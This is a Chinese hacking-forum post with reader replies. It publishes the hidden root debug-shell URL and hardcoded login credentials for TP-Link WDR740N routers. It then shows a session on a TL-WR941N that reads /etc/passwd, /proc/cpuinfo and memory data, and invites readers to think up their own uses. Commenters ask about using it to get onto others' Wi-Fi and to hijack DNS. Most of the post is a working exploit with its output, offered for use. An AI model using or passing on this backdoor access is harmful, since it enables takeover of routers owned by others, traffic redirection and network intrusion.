【干货】TP
本帖最后由 过客 于 2013-5-26 19:26 编辑TP-LinkWDR740ND/WDR740N 路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。
固件版本:3.12.11 Build 111130 Rel.55312n and possibly others
exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html
User: osteamPassword: 5up
使用这个shell 攻击者可能会添加恶意的路由规则或更改配置文件。
==============以上是废话==============
过客的路由器是:TP-Link TL-WR941N
软件版本:3.11.7 Build 100723 Rel.46142n
硬件版本:WR941N v4/v5 00000000
开始测试:[*]cat /proc/cpuinfo&
[*]827
[*]# system type : Atheros AR7240 (Python)
[*]processor : 0
[*]cpu model : MIPS 24K V7.4
[*]BogoMIPS : 265.21
[*]wait instruction : yes
[*]microsecond timers : yes
[*]tlb_entries : 16
[*]extra interrupt vector : yes
[*]hardware watchpoint : yes
[*]ASEs implemented : mips16
[*]VCED exceptions : not available
[*]VCEI exceptions : not available
[*]
[*]cat /etc/passwd&
[*]828
[*]# root:x:0:0:root:/root:/bin/sh
[*]Admin:x:0:0:root:/root:/bin/sh
[*]bin:x:1:1:bin:/bin:/bin/sh
[*]daemon:x:2:2:daemon:/usr/sbin:/bin/sh
[*]adm:x:3:4:adm:/adm:/bin/sh
[*]lp:x:4:7:lp:/var/spool/lpd:/bin/sh
[*]sync:x:5:0:sync:/bin:/bin/sync
[*]shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
[*]halt:x:7:0:halt:/sbin:/sbin/halt
[*]uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
[*]operator:x:11:0:Operator:/var:/bin/sh
[*]nobody:x:65534:65534:nobody:/home:/bin/sh
[*]ap71:x:500:0:Linux User,,,:/root:/bin/sh
[*]
[*]cat /proc/meminfo&
[*]843
[*]# MemTotal: 30676 kB
[*]MemFree: 12876 kB
[*]Buffers: 1836 kB
[*]Cached: 6056 kB
[*]SwapCached: 0 kB
[*]Active: 6116 kB
[*]Inactive: 3892 kB
[*]HighTotal: 0 kB
[*]HighFree: 0 kB
[*]LowTotal: 30676 kB
[*]LowFree: 12876 kB
[*]SwapTotal: 0 kB
[*]SwapFree: 0 kB
[*]Dirty: 0 kB
[*]Writeback: 0 kB
[*]Mapped: 4276 kB
[*]Slab: 5436 kB
[*]CommitLimit: 15336 kB
[*]Committed_AS: 4324 kB
[*]PageTables: 276 kB
[*]VmallocTotal:1048560 kB
[*]VmallocUsed: 1944 kB
[*]VmallocChunk:1046464 kB
[*]
[*]# ls /
[*]bin etc linuxrcproc sbin usr web
[*]dev lib mnt root tmp var
[*]# 复制代码至于利用这个东西能干啥……那就自己发挥吧,走了。
额,好牛逼的样子 我不懂 哦。
007.gif
不错。。。 谢谢分享 不懂,能蹭网不 不懂。。可以劫持DNS吗? 不错啊分享 学习了
008.gif
80端口被封,还是好事